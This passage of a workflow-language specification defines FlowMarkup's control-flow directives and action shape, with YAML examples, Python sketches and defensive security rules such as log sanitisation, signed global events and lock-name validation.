Post-condition loop. Once entered, the body executes at least once; `until:` is evaluated after each iteration. Supports an optional `condition:` pre-execution guard: when false, the repeat step is not entered and the body does not execute.

```yaml
- repeat:
    do:
      - call: { service: status, operation: check, result: { job_status: =RESULT.status } }
      - wait: 2s
    until: "=job_status == 'ready'"
```

| Key | Type | Required | Description |
|---|---|---|---|
| `do` | stepList | Yes | Loop body — executes at least once |
| `until` | CEL (boolean) | Yes | Exit condition — checked after each iteration |
| `timeout` | DURATION | No | Maximum total loop duration; raises `TimeoutError` if exceeded |
| `maxIterations` | integer | No | Maximum iteration count (default: 100,000). Raises `ResourceLimitError` if exceeded. |

### 3.6 `try`

At least one of `catch` or `finally` MUST be present. Supports optional `condition:` pre-execution guard — when false, the entire `try` (including `finally:`) is skipped.

```yaml
- try:
    do:
      - <step>
    catch:
      TimeoutError:
        - <step>
      ServiceError:
        condition: "=ERROR.MESSAGE.contains('transient')"
        do:
          - <step>
      default:
        - <step>
    finally:
      - <step>
```

`catch:` is a map. Keys matched in YAML key order; first match wins. `default` MUST be last.

> **Normative:** FlowMarkup requires YAML parsers that preserve mapping key insertion order. All FlowMarkup-compatible parsers MUST preserve insertion order for `catch:` maps, `switch.match:` maps, and any other context where key order determines evaluation semantics. Engines MUST validate at load time that their YAML parser preserves insertion order for mappings. If the parser does not preserve order, the engine MUST raise `ConfigurationError` at startup.

**YAML merge key (`<<`) restriction.** Flow definitions MUST NOT use the YAML merge key (`<<`) syntax, and engines MUST reject YAML documents that contain it; SA-YAML-2 MUST reject at severity ERROR. A merge key can inject unexpected properties into a mapping from anchored nodes, potentially overriding security-critical fields such as `requires`, `cap`, `integrity`, or `tls` settings. Engines MUST NOT resolve merge keys as an alternative to rejection, because resolving them before validation would let merged properties override those fields before any check runs. *(CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes)*

Catch clauses support an optional `condition:` guard. When a clause matches by error type but its `condition:` evaluates to false, the error **falls through** to the next matching clause. Clause form: `{ condition: <cel-expression>, do: [<steps>] }`. The `ERROR` binding is available in the condition.
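The fall-through behaviour can be sketched in Python as below. This is illustrative only: `select_catch_clause` is a hypothetical name, `evaluate` stands in for the engine's CEL evaluator, and error types are matched by exact name (any error type hierarchy is ignored).

```python
def select_catch_clause(catch_map, error, evaluate):
    """Return the step list of the first clause that accepts `error`, else None.

    catch_map -- the catch: map, iterated in YAML key order
    error     -- dict with at least "TYPE" and "MESSAGE"
    evaluate  -- callable(condition, error) -> bool (stand-in for CEL)
    """
    for key, clause in catch_map.items():
        if key != "default" and key != error["TYPE"]:
            continue
        if isinstance(clause, dict):  # { condition, do } clause form
            if "condition" in clause and not evaluate(clause["condition"], error):
                continue  # guard is false: fall through to the next clause
            return clause["do"]
        return clause  # plain step-list form
    return None


catch_map = {
    "TimeoutError": ["retry"],
    "ServiceError": {"condition": "transient", "do": ["back_off"]},
    "default": ["alert"],
}
# Toy evaluator: the "condition" is a substring to look for in the message.
contains = lambda condition, err: condition in err["MESSAGE"]

transient = select_catch_clause(
    catch_map, {"TYPE": "ServiceError", "MESSAGE": "transient upstream failure"}, contains)
fatal = select_catch_clause(
    catch_map, {"TYPE": "ServiceError", "MESSAGE": "fatal"}, contains)
```

The second call matches `ServiceError` by type, fails its guard, and therefore lands in `default`.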

Error context: `ERROR.TYPE`, `ERROR.MESSAGE`, `ERROR.STEP`, `ERROR.DATA.*`, `ERROR.CAUSE`.

**Auto-cause on rethrow:** `throw` inside `catch` automatically sets the new error's `cause` to the caught error.

### 3.7 `set`

Assign one or more variables. Keys are target variable names (never `=`-prefixed). Values follow the `=` prefix rule.

```yaml
- set:
    counter: 0
    status: pending
    GLOBAL.request_count: =GLOBAL.request_count + 1
```

Values MAY use the typed declaration form (`$kind`/`$value`).

#### `$readonly` in `set:`

A `set:` target can be marked `$readonly: true` to freeze a computed value mid-flow:

```yaml
- set:
    computed_threshold:
      $readonly: true
      $kind: NUMBER
      $value: =base_threshold * multiplier
```

**Copy semantics:** When assigning a readonly data element's value to another target, only the value is copied. The `$readonly` property does not propagate:

```yaml
# world is readonly
- set:
    hello: =world    # hello gets world's value but is NOT readonly
```

### 3.8 `log`

```yaml
- log: "Processing {{item.name}}"                    # shorthand, level: INFO
- log: { level: WARN, message: "Retrying" }          # full form
- log: { level: "=GLOBAL.verbose ? 'DEBUG' : 'INFO'", message: "..." }  # dynamic level
```

### 3.9 `logWarn` / `logError`

```yaml
- logWarn: "Overnight order {{order.id}} — expedited pipeline"
- logError: "Payment failed: {{ERROR.MESSAGE}}"
```

**Shorthand directives** — `logWarn: X` desugars to `log: { level: WARN, message: X }`. `logError: X` desugars to `log: { level: ERROR, message: X }`.

String form only — the value is a CEL expression or template string (same as `log:` string form). Step-level `condition:` and annotations (`_id_`, `_label_`, `_notes_`, `_meta_`) are supported as sibling keys. Use the full `log:` object form when you need dynamic level (`level: =expr`).

Why only WARN and ERROR: these are the only levels commonly set explicitly in flow definitions (INFO is the default for `log:`, DEBUG/TRACE are rare in production flows).

**Log sanitization.** The engine MUST sanitize all interpolated values in log output: (1) replace `\r` and `\n` with their escaped representations `\\r` and `\\n`, (2) strip ANSI escape sequences and the control bytes 0x1B-0x1F (`\t`, byte 0x09, lies outside this range and is preserved), (3) for structured log formats (JSON), properly escape interpolated values as JSON strings. SA-LOG-1 (ERROR) flags template interpolation of user-controlled values (`input:` parameters, `EVENT.DATA.*`) in log messages without sanitization. *(CWE-117)*
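One possible shape for such a sanitizer, as a hedged Python sketch: the names `sanitize` and `to_json_log` are hypothetical, and the regular expression covers only CSI-style ANSI sequences (such as colour codes), which is an assumption about what needs stripping.

```python
import json
import re

# CSI sequences such as ESC[31m; other escape families are not covered here.
ANSI_ESCAPE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")
# Any remaining bytes in the range 0x1B-0x1F.
LOW_CONTROL = re.compile(r"[\x1b-\x1f]")


def sanitize(value):
    """Neutralise line breaks and terminal escapes in an interpolated value."""
    text = str(value)
    text = ANSI_ESCAPE.sub("", text)
    text = LOW_CONTROL.sub("", text)
    return text.replace("\r", "\\r").replace("\n", "\\n")


def to_json_log(message, **fields):
    """Structured form: json.dumps escapes each value as a JSON string."""
    record = {"message": message}
    record.update({key: sanitize(val) for key, val in fields.items()})
    return json.dumps(record)


clean = sanitize("alice\r\nERROR forged \x1b[31mred\x1b[0m")
line = to_json_log("login", user='a"b\n')
```

After sanitization the forged second line stays on the same log line as the literal characters `\r\n`, so it cannot pass for a separate entry.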

### 3.10 `switch`

```yaml
- switch:
    value: =order.status
    match:
      rush:
        - log: "Rush order"
      standard:
        - set: { priority: normal }
    default:
      - log: "Unknown status"
```

`match:` keys MUST NOT start with `=` or contain `{{ }}`. Supports optional `condition:` pre-execution guard — when false, the switch is skipped entirely.

Match comparison uses **strict equality** with no type coercion. It follows standard CEL type semantics: cross-type `==` is `false`, except that numeric types are compared by value. `1 == '1'` evaluates to `false`; `1 == 1.0` evaluates to `true` (numeric promotion only). YAML 1.2.2 key types are preserved: `1` (integer) does not match `"1"` (string); `true` (boolean) does not match `"true"` (string). YAML boolean coercion (YAML 1.1 `yes`/`no`/`on`/`off` → boolean) is not applicable because the spec mandates YAML 1.2.2, which does not auto-coerce these values. The evaluated `value:` result is compared as-is against each key. Comparison is case-sensitive for strings. Quote keys when string matching is intended (see §2.1).
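The comparison rules can be approximated in Python as follows. This is a sketch under assumptions: `strict_equal` and `select_branch` are hypothetical names, and Python's own types stand in for the YAML and CEL types. Booleans need explicit handling because Python treats `True == 1` as true, which the rules above do not.

```python
def strict_equal(value, key):
    """Equality without coercion, apart from int/float numeric promotion."""
    # bool is a subclass of int in Python, so it must be checked first.
    if isinstance(value, bool) or isinstance(key, bool):
        return isinstance(value, bool) and isinstance(key, bool) and value == key
    numeric = (int, float)
    if isinstance(value, numeric) and isinstance(key, numeric):
        return value == key  # numeric promotion only
    return type(value) is type(key) and value == key


def select_branch(value, match, default=None):
    """Return the steps of the first match: key equal to value, else default."""
    for key, steps in match.items():
        if strict_equal(value, key):
            return steps
    return default


match = {"rush": ["log rush"], "standard": ["set priority"]}
chosen = select_branch("rush", match, default=["log unknown"])
fallback = select_branch("Rush", match, default=["log unknown"])  # case-sensitive
```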

When `switch.value` compares against security-sensitive values (e.g., API keys, tokens, capability names), the engine MUST use constant-time comparison to prevent timing side-channel attacks. Implementations MAY use platform-native constant-time comparison functions (e.g., `crypto.timingSafeEqual` in Node.js, `hmac.Equal` in Go).

### 3.11 `throw`

```yaml
- throw:
    error: ValidationError       # static type name
    message: "='Field ' + field_name + ' is required'"
    data:
      field: =field_name
```

**Auto-cause** when inside a `catch` block.

**Key naming:** `error:` in `throw:` identifies the error type to raise at runtime. `$kind:` in `throws:` declarations is a type-system metadata key used in the contract definition. The distinction mirrors the separation between runtime directives and declarative type metadata throughout the specification.

`throw` supports the standard `condition:` pre-execution guard (see section 4.1). When the condition evaluates to false, the throw is skipped entirely.

### 3.12 `assert`

```yaml
- assert: =result != null                    # shorthand
- assert:
    condition: =items.size() > 0
    message: "='Expected items, got ' + string(items.size())"
```

Throws `AssertionError` on false. Engines MUST NOT elide or skip `assert` evaluation in any mode — assertions are always enforced at runtime. Static analysis treats `assert` as a reachability hint.

### 3.13 `return`

Terminates the **entire flow instance**. `finally:` still runs. `return` inside `finally:` is a static analysis error.

Static analysis rule SA-FINALLY-1 (ERROR) MUST reject `return` inside `finally:` blocks. If encountered at runtime, the engine MUST raise `ConfigurationError`.

```yaml
- return: { result: =cached_value, status: from-cache }  # multi-value (explicit)
- return: { order_id:, status: fulfilled }                 # multi-value (null = same-name: order_id: → =order_id)
- return: [records_loaded, validation_status]               # list form (all same-name)
- return: =generated_image                                 # single-value
- return:                                                  # bare return
```

**Null-value shorthand:** In object form, `key:` (YAML null) → `key: =key` — passes the local variable with the same name. **List form:** `return: [a, b, c]` → `{a: =a, b: =b, c: =c}`. Mixed object form allows null-value and explicit-value keys together.
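The expansion of both shorthands can be sketched in Python over the parsed YAML value. The function name `normalize_return` is hypothetical, and the sketch treats the single-value and bare forms as already normalized.

```python
def normalize_return(value):
    """Expand the list form and null-value shorthand of a parsed `return:` value."""
    if isinstance(value, list):
        # return: [a, b] -> {a: =a, b: =b}
        return {name: f"={name}" for name in value}
    if isinstance(value, dict):
        # key: (YAML null) -> key: =key ; explicit values are kept as written
        return {key: (f"={key}" if val is None else val) for key, val in value.items()}
    return value  # single-value or bare return


from_list = normalize_return(["records_loaded", "validation_status"])
mixed = normalize_return({"order_id": None, "status": "fulfilled"})
```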

In parallel context, `return` cancels all branches and terminates the entire flow.

### 3.14 `yield`

Produces a value without terminating. Requires `yields:` declaration (SA-YIELD-7).

```yaml
- yield: =token                  # single-value
- yield: { text: =chunk, index: =i }  # multi-value
- yield:                         # bare: null heartbeat
```

**Context restrictions:**
- Forbidden in `onTimeout:` (SA-YIELD-5), `lock` bodies (SA-YIELD-6), RACE branches (SA-YIELD-10)
- Discouraged in `finally:` (SA-YIELD-1 warning)
- Inside `transaction: true`, yields are buffered until commit (SA-YIELD-12). On rollback, buffered yields are discarded. `yield` inside a `rollback:` handler is a static analysis error (SA-YIELD-21)

#### YIELD binding and `onYield:` semantics

The `YIELD` built-in binding is available inside `onYield.do:` blocks. Its shape depends on the yielding flow's `yields:` declaration:

- **Single-value** (`yields: { $kind: TEXT }`): `YIELD.VALUE` is the yielded value directly (e.g., a string). `YIELD.INDEX` is the 0-based sequential integer index of this yield within the current execution.
- **Multi-param** (`yields: { params: { text: ..., index: ... } }`): `YIELD.VALUE` is a map with the declared param keys (e.g., `YIELD.VALUE.text`, `YIELD.VALUE.index`).

**`as:` interaction:** When `onYield:` specifies `as: name` (e.g., `as: token`), the named variable replaces `YIELD.VALUE` — i.e., `token` and `YIELD.VALUE` refer to the same value. `YIELD.INDEX` remains accessible regardless of `as:`.

**`YIELD.INDEX` guarantees:** 0-based integer, monotonically increasing, sequential (no gaps). Available in both `onYield.do:` and `FORWARD` modes (in FORWARD mode, the index is passed through to the caller's `onYield:` handler).

#### `onYield:` applicability by action type

`onYield:` is available on actions that support streaming output:

| Action | Streaming support | Notes |
|--------|------------------|-------|
| `call` | Yes | When the service produces streaming output |
| `run` | Yes | When the sub-flow declares `yields:` |
| `exec` | Yes | Streams stdout |
| `ssh` | Yes | Streams stdout |
| `request` | Yes | SSE and chunked HTTP responses |
| `mail` | No | Does not produce streaming output |
| `storage` | No | Does not produce streaming output |

### 3.15 `wait`

Duration-based pause.

```yaml
- wait: 5s           # duration literal
- wait: 500          # integer milliseconds
- wait: =computed    # CEL expression
```

**Object form** with optional `condition:` guard:

```yaml
- wait:
    condition: =poll_result != 'confirmed'    # skip wait if false
    duration: 5s
```

| Key | Type | Description |
|---|---|---|
| `duration` | DURATION / INTEGER / CEL | How long to pause (same values as shorthand form) |
| `condition` | CEL (boolean) | Pre-execution guard — wait is skipped if false |
| `maxDuration` | DURATION | Maximum wait duration. Default: `24h`. Computed durations exceeding `maxDuration` raise `ResourceLimitError` at runtime. Literal durations exceeding `maxDuration` raise `ValidationError` at load time. Engine configurable maximum: `30d`. |

**Checkpoint resume:** The engine stores the target resume timestamp. On checkpoint recovery, if the target time has already passed, the `wait` completes immediately. Otherwise, the engine waits for the remaining duration.
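Because the checkpoint stores an absolute target time rather than a remaining duration, the resume computation is a clamped subtraction. A minimal Python sketch, with `remaining_wait` as a hypothetical helper name:

```python
from datetime import datetime, timedelta, timezone


def remaining_wait(target_resume_at, now):
    """Time still to wait after recovery; zero if the target has passed."""
    return max(target_resume_at - now, timedelta(0))


target = datetime(2026, 3, 8, 9, 0, tzinfo=timezone.utc)
still_pending = remaining_wait(target, datetime(2026, 3, 8, 8, 58, tzinfo=timezone.utc))
already_due = remaining_wait(target, datetime(2026, 3, 8, 9, 30, tzinfo=timezone.utc))
```

Storing the target timestamp means time spent while the engine was down counts toward the wait, so a long outage does not lengthen the pause.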

**Duration bounds.** The engine MUST enforce a configurable maximum wait duration (default: 24 hours, configurable maximum: 30 days). SA-WAIT-1 (WARN) flags `wait` with CEL-derived duration (`wait: =computed`) and no `maxDuration` or `timeout:` constraint on the enclosing step or group. *(CWE-770)*

### 3.16 `waitUntil`

Timestamp-based pause. Past timestamps complete immediately. Supports optional `condition:` pre-execution guard — when false, the step is skipped entirely.

```yaml
- waitUntil: "2026-03-08T09:00:00Z"
- waitUntil: =expiration_date
```

**Object form** with optional `timeout:`:

```yaml
- waitUntil:
    timestamp: =scheduled_at          # the target timestamp
    timeout: 24h                       # max wait duration — raises TimeoutError if exceeded
```

| Key | Type | Description |
|---|---|---|
| `timestamp` | STRING (ISO 8601) / CEL | Target timestamp to wait until |
| `timeout` | DURATION | Maximum wait duration; raises `TimeoutError` if exceeded |

Format: ISO 8601 with timezone. `null` or invalid -> `ValidationError`.

### 3.17 `break`

Exit innermost loop. Static analysis error if outside a loop. Forbidden in `finally:`.

```yaml
- break:
- break: { condition: =job_status == 'completed' }
```

### 3.18 `continue`

Skip to next iteration. Same scoping rules as `break`.

> **Concurrent `forEach`:** `break` and `continue` are forbidden inside concurrent `forEach` iterations. Use `completionCondition` for controlled early termination of concurrent loops. SA-CTRL-10 (ERROR) enforces this restriction.

### 3.19 `emit`

Fire an event.

```yaml
- emit: order_ready                              # shorthand
- emit:
    event: payment_received                      # static event type
    scope: CONTEXT                               # LOCAL (default) | CONTEXT | GLOBAL
    data: { order_id: =order.id }
```

Events are buffered per scope. Buffer size is engine-configurable (default: 1024 events per scope). The engine MUST enforce per-flow-instance event emit quotas to prevent a single flow from exhausting shared event buffers (default: 256 events per scope per flow instance). Quota resets per flow invocation. The per-flow-instance emit quota consumed inside rolled-back transaction groups MUST be refunded — the event counter MUST be decremented when buffered events are discarded on rollback. This prevents denial-of-service via repeated emit-then-rollback loops. Buffer full or quota exceeded raises `EventBufferFullError` (retryable). SA-EMIT-5 warns when a flow emits events in an unbounded loop without rate limiting. `emit.event` is a static identifier, not CEL. SA-EVENT rules apply.

**Default scope.** `emit.scope` defaults to `LOCAL`. Emitted events are delivered only within the current flow instance scope unless an explicit `scope:` is specified.

### 3.20 `waitFor`

Block until event received.

```yaml
- waitFor: order_ready                            # shorthand
- waitFor:
    event: payment_received
    scope: GLOBAL
    timeout: 30m
    condition: =EVENT.DATA.order_id == expected_id  # post-receive filter
    capture:
      paid_order_id: =EVENT.DATA.order_id
```

`condition:` is a **post-receive filter**, not a pre-execution guard. When the condition evaluates to false, the event is discarded and the step continues waiting for the next matching event. Capture binds `EVENT.DATA` fields to flow variables after the condition check.

**Default scope.** `waitFor.scope` defaults to `LOCAL`. Events are only received from the matching scope. A `waitFor` without explicit `scope:` only receives events emitted with `scope: LOCAL` (or default scope) within the same flow instance.

**GLOBAL event source verification.** Events with `scope: GLOBAL` MUST include a cryptographically verified source identifier. Engines MUST reject GLOBAL events that lack source authentication. The source authentication mechanism MUST use HMAC-SHA256 or digital signatures — bearer tokens alone are insufficient for GLOBAL event source authentication. The engine MUST stamp each event with an immutable `EVENT.SOURCE` identity containing the emitting flow's fully-qualified identifier, tenant ID, and instance ID. The `EVENT.SOURCE` MUST be cryptographically signed by the emitting engine instance using HMAC-SHA256 (with a per-tenant key) or a digital signature (with a per-engine key). Receiving engines MUST verify the signature before delivering the event to a `waitFor` listener. The `waitFor` directive MUST support a `source:` filter to restrict which flow identities are accepted. When `source:` is not specified on a `waitFor` with scope GLOBAL, static analysis rule SA-EVENT-11 MUST emit an ERROR indicating the listener accepts events from any flow instance, which may enable cross-tenant or cross-flow event spoofing. *(CWE-345: Insufficient Verification of Data Authenticity)*

**GLOBAL event signature format.** The `EVENT.SOURCE` structure for GLOBAL events MUST contain:
```
{
  flow_id:      string,   // fully-qualified flow identifier
  tenant_id:    string,   // emitting tenant
  instance_id:  string,   // emitting flow instance
  engine_id:    string,   // emitting engine instance
  timestamp:    string,   // ISO 8601 with millisecond precision
  nonce:        string,   // UUID v4 — unique per event, prevents replay attacks
  signature:    string    // Base64-encoded HMAC-SHA256 or digital signature
}
```
The signature MUST cover the concatenation of `flow_id`, `tenant_id`, `instance_id`, `engine_id`, `timestamp`, `nonce`, `EVENT.TYPE`, and a SHA-256 digest of `EVENT.DATA` (canonicalised as JSON with sorted keys, no whitespace). When HMAC-SHA256 is used, the key MUST be a per-tenant secret managed through the engine's secret provider — it MUST NOT be hardcoded or derived from publicly visible identifiers. When digital signatures are used, the signing key MUST be a per-engine private key with the corresponding public key distributed through the engine's key management facility.
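
The HMAC-SHA256 variant of the signature rule above can be sketched as follows. This is a minimal illustration, not the engine's implementation: the function names are hypothetical, the fields are joined with no separator (one literal reading of "concatenation"), the `EVENT.DATA` digest is hex-encoded, and `json.dumps` with sorted keys stands in for the canonical JSON form. All of these are assumptions of the sketch.

```python
import base64
import hashlib
import hmac
import json

# Field order follows the specification text. Joining with no separator and
# hex-encoding the data digest are assumptions of this sketch.
SIGNED_FIELDS = ("flow_id", "tenant_id", "instance_id", "engine_id", "timestamp", "nonce")


def canonical_data_digest(event_data):
    """SHA-256 digest of EVENT.DATA serialised as JSON with sorted keys, no whitespace."""
    canonical = json.dumps(event_data, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def signing_input(source, event_type, event_data):
    """Build the byte string that the signature covers."""
    parts = [source[name] for name in SIGNED_FIELDS]
    parts.append(event_type)
    parts.append(canonical_data_digest(event_data))
    return "".join(parts).encode("utf-8")


def sign_event(tenant_key, source, event_type, event_data):
    """Return the Base64-encoded HMAC-SHA256 signature for a GLOBAL event."""
    mac = hmac.new(tenant_key, signing_input(source, event_type, event_data), hashlib.sha256)
    return base64.b64encode(mac.digest()).decode("ascii")


def verify_event(tenant_key, source, event_type, event_data):
    """Recompute the signature and compare it in constant time."""
    expected = sign_event(tenant_key, source, event_type, event_data)
    return hmac.compare_digest(expected, source.get("signature", ""))
```

A receiving engine would call `verify_event` before delivery and reject the event when it returns `False`. The per-tenant key is expected to come from the engine's secret provider, never from the flow definition.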

**Signature verification failure handling.** When signature verification fails, the engine MUST: (1) reject the event — it MUST NOT be delivered to any `waitFor` listener; (2) emit an audit log entry at ERROR level containing the event type, claimed source, reason for rejection, and the receiving engine's identity; (3) increment a `global_event_signature_failures` metric counter. Engines MUST support key rotation by accepting signatures from both the current and immediately previous key during a configurable grace period (default: 1 hour, max: 24 hours). SA-EVENT-15 (ERROR) MUST flag GLOBAL event emission in flows that lack access to the tenant signing key.

**Replay prevention.** Receiving engines MUST maintain a nonce cache (minimum retention: key rotation grace period + 5 minutes) and reject events with duplicate nonces. Receiving engines MUST reject events with `timestamp` older than a configurable maximum age (default: 5 minutes). *(CWE-294: Authentication Bypass by Capture-replay)*
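
The two replay checks above (maximum event age and nonce uniqueness) might be combined as in the sketch below. The class name `ReplayGuard`, the in-memory dictionary, and the use of epoch seconds are assumptions for illustration. The default retention of 3900 seconds corresponds to the default 1 hour grace period plus 5 minutes.

```python
class ReplayGuard:
    """In-memory nonce cache with a maximum event age (illustrative only)."""

    def __init__(self, max_age_seconds=300, retention_seconds=3900):
        self.max_age = max_age_seconds
        self.retention = retention_seconds
        self._seen = {}  # nonce -> time the event was accepted

    def accept(self, nonce, event_time, now):
        """Return True if the event may be delivered, False if it must be rejected."""
        # Evict nonces that are older than the retention period.
        cutoff = now - self.retention
        self._seen = {n: t for n, t in self._seen.items() if t >= cutoff}

        if now - event_time > self.max_age:
            return False  # timestamp older than the configured maximum age
        if nonce in self._seen:
            return False  # duplicate nonce: replayed event
        self._seen[nonce] = now
        return True
```

A production engine would need a store shared by all receiving engine instances. A per-process dictionary only detects replays that arrive at the same process.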

**`capture:` shorthand forms** (aligned with `result:` which supports the same patterns):

```yaml
# Null-value form: null value → =EVENT.DATA.<name>
capture:
  decision:              # → =EVENT.DATA.decision
  approver:              # → =EVENT.DATA.approver

# List form: each name receives EVENT.DATA.<name>
capture: [decision, approver]

# Object form (explicit mapping)
capture:
  local_name: =EVENT.DATA.remote_name
```

### 3.21 `lock`

Mutual exclusion group.

```yaml
- lock:
    name: 'account_balance'     # CEL expression
    mode: EXCLUSIVE             # EXCLUSIVE (default) | SHARED
    scope: GLOBAL
    timeout: 5s
    do:
      - set: { GLOBAL.account_balance: "=GLOBAL.account_balance - amount" }
```

**Default scope.** `lock.scope` defaults to `LOCAL`. A lock without explicit `scope:` provides mutual exclusion only within the current flow instance. For cross-instance mutual exclusion, specify `scope: GLOBAL` explicitly.

**EXCLUSIVE:** Single holder. `GLOBAL.*`/`CONTEXT.*` writes buffered and committed atomically. `LOCAL.*` writes immediate.

**SHARED:** Multiple concurrent readers. Consistent snapshot for duration.

Lock acquisition timeout raises `TimeoutError`. The engine MUST enforce a maximum lock wait timeout (default: 5 minutes, configurable per-tenant). Locks without explicit `timeout:` use the engine default. This prevents indefinite blocking from contended locks.

`lock` supports an optional `condition:` pre-execution guard. When the guard evaluates to false, the lock body is skipped entirely.

**Reentrant:** Nested lock with same name+scope within the same flow execution context is a no-op. Sub-flows invoked synchronously inherit the caller's lock context. `async: true` sub-flows start a new lock context.

Static analysis: SA-LOCK and SA-CONC rules apply.

**Lock name validation.** To prevent injection attacks, the engine MUST validate every lock name, including names computed from CEL expressions that reference user input, against the pattern `^[a-zA-Z0-9_.-]{1,256}$` and reject non-conforming names with a `ValidationError`. Engines MUST NOT allow lock names derived from user input without sanitization. Static analysis rule SA-LOCK-10 MUST flag CEL-derived lock names that incorporate user-controlled input.

**Lock namespacing.** The engine MUST automatically prepend a namespace prefix (format: `<tenant_id>/<flow_id>/`) to all lock names before registry operations, ensuring that locks from different flows or tenants cannot collide or interfere with each other. This prevents lock-name pollution attacks where an adversary creates many uniquely-named locks to exhaust the engine's lock registry. *(CWE-400: Uncontrolled Resource Consumption)*
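
As a rough sketch of the validation and namespacing rules above, assuming the hypothetical helper name `qualify_lock_name` and a locally defined `ValidationError`:

```python
import re

# Pattern taken from the specification text; it applies to the unprefixed name.
LOCK_NAME_PATTERN = re.compile(r"^[a-zA-Z0-9_.-]{1,256}$")


class ValidationError(Exception):
    """Stand-in for the engine's ValidationError."""


def qualify_lock_name(tenant_id, flow_id, computed_name):
    """Validate a computed lock name and prepend the <tenant_id>/<flow_id>/ prefix."""
    # fullmatch rejects a trailing newline, which a bare `$` would tolerate.
    if not LOCK_NAME_PATTERN.fullmatch(computed_name):
        raise ValidationError(f"invalid lock name: {computed_name!r}")
    return f"{tenant_id}/{flow_id}/{computed_name}"
```

Validation runs on the name as computed by the flow, before the prefix is added, so the `/` separators in the prefix never have to satisfy the pattern.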

**Lock registry limits:** The engine MUST enforce a configurable maximum lock registry size **per tenant** (default: 10,000). When exceeded, the engine raises `ResourceExhaustedError`. Dynamic lock names (CEL expressions) risk unbounded registry growth; SA-LOCK-8 warns on dynamic lock names. Prefer static lock names or bounded sets derived from enum values.

**Per-flow lock limit:** The engine MUST enforce a configurable maximum lock count per flow definition (default: 100, maximum: 10,000). This prevents a single flow from monopolizing the tenant's lock budget.

**Lock lifecycle:** Locks acquired within a flow instance MUST be released when the flow instance completes (success, error, or cancellation). The engine MUST implement a lock TTL (default: 1 hour, configurable per-tenant) after which unreleased locks are automatically reclaimed.

**Orphaned lock detection:** Engines MUST detect locks held by terminated or crashed flow instances and release them within a configurable detection interval (default: 30 seconds, maximum: lock TTL).

**Starvation prevention:** The engine SHOULD implement lock starvation prevention (e.g., fair queuing) to prevent SHARED locks from indefinitely starving EXCLUSIVE lock waiters.

> **Cross-instance deadlock detection.** The engine MUST implement cross-instance deadlock detection via wait-for graph analysis. When a cycle is detected in the global lock wait-for graph, the engine MUST immediately raise `DeadlockError` on the newest waiter rather than waiting for lock timeout. *(CWE-833)*
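
One way to picture the wait-for graph check is the sketch below. The graph representation (a dictionary from a flow instance to the set of instances it is waiting on) and the function name `would_deadlock` are assumptions. The check runs when a new wait is about to be registered, so the instance whose request closes the cycle is the newest waiter.

```python
def would_deadlock(wait_for, waiter, holders):
    """Return True if making `waiter` wait on `holders` closes a cycle.

    wait_for: dict mapping an instance ID to the set of instance IDs it waits on.
    waiter:   the instance requesting a lock (the newest waiter).
    holders:  the instances currently holding the requested lock.
    """
    stack = list(holders)
    visited = set()
    while stack:
        node = stack.pop()
        if node == waiter:
            return True  # a holder transitively waits on the requester
        if node in visited:
            continue
        visited.add(node)
        stack.extend(wait_for.get(node, ()))
    return False
```

When the function returns `True`, an engine following the rule above would raise `DeadlockError` on `waiter` immediately instead of letting the lock timeout expire.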

### 3.22 `cancel`

Cancels a sub-flow instance referenced by a FlowHandle.

```yaml
# Shorthand form
- cancel: =payment_proc

# Full form with optional condition
- cancel:
    handle: =payment_proc
    condition: =elapsed > timeout
```

**Semantics:**
- Sends cancellation signal to the referenced sub-flow instance.
- Sub-flow's `finally:` still runs (graceful cancellation).
- If already completed/cancelled, no-op (not an error).
- Non-blocking — returns immediately.
- Only valid for sub-flows started with `handle:` on a `run:` step.

**Why a directive, not a CEL method:** CEL is designed to be side-effect-free. `cancel` is a control flow operation with external effects. Making it a directive (like `emit`, `log`, `wait`) keeps CEL pure.

Static analysis: SA-CANCEL-1 (ERROR) rejects `cancel:` referencing an identifier that is not a FlowHandle. SA-HANDLE-4 (WARN) warns when cancelling a synchronous (non-async) `run:` step handle.

---

## 4. Actions

### 4.1 Universal Shape

```yaml
- <action-name>:
    _label_: "Human-readable"
    _id_: step_name
    _notes_: "..."
    _meta_: {}
    condition: "<cel-expression>"
    timeout: duration|integer|CEL
    onTimeout:
      after: duration
      do: [ <step> ]
    retry: "3/2s/EXPONENTIAL"    # string shorthand: maxAttempts[/delay[/backoff]]
    # OR object form:
    # retry:
    #   maxAttempts: integer
    #   delay: duration|integer|CEL
    #   backoff: FIXED|LINEAR|EXPONENTIAL
    #   maxDelay: duration|integer|CEL
    #   jitter: true              # true=25%, false=none, number 0.0-1.0, or "25%"
    #   onErrors: [ErrorType]          # retryable whitelist
    #   nonRetryable: [ErrorType]    # (mutually exclusive with onErrors)
    rateLimit:
      invocations: integer|CEL
      per: duration|integer|CEL
      strategy: WAIT|REJECT
      scope: LOCAL|CONTEXT|GLOBAL
      key: "<cel-expression>"
      timeout: duration|integer|CEL
    circuitBreaker:                           # "threshold/name" | integer | =CEL | object
      name: '<cel-expression>'
      threshold: integer|CEL
      window: duration|integer|CEL
      resetTimeout: duration|integer|CEL
      halfOpenAttempts: integer|CEL
      scope: LOCAL|CONTEXT|GLOBAL
      errors: [ErrorType]
      nonCountable: [ErrorType]
    async: false
    params: { key: =expr, ... } | { key:, ... } | [key1, key2]
    result: variable_name | { target: =RESULT.source, $yields: var } | [key1, key2]
    onYield: { do: [...] } | FORWARD
    errors: [ErrorType]          # declared error types the action may throw
    rollback: [ <step> ]
    catch:
      ErrorType:
        - <step>
      default:
        - <step>
```

**Execution order:** `circuitBreaker -> rateLimit -> retry -> timeout -> action execution`

**`catch:`** -- per-step inline error handler (desugars to `try:/catch:`). Mutually exclusive with `rollback:` (SA-ERR-7). Not available on `async: true` (SA-ERR-6).

> **`catch:` + `rollback:` pattern:** When a step needs both error handling (on failure) and compensation (on success followed by later failure), wrap the step in `try:/catch:` and place `rollback:` on the `try:` block. The `catch:` handles immediate failures; the `rollback:` registers compensation for the success path.

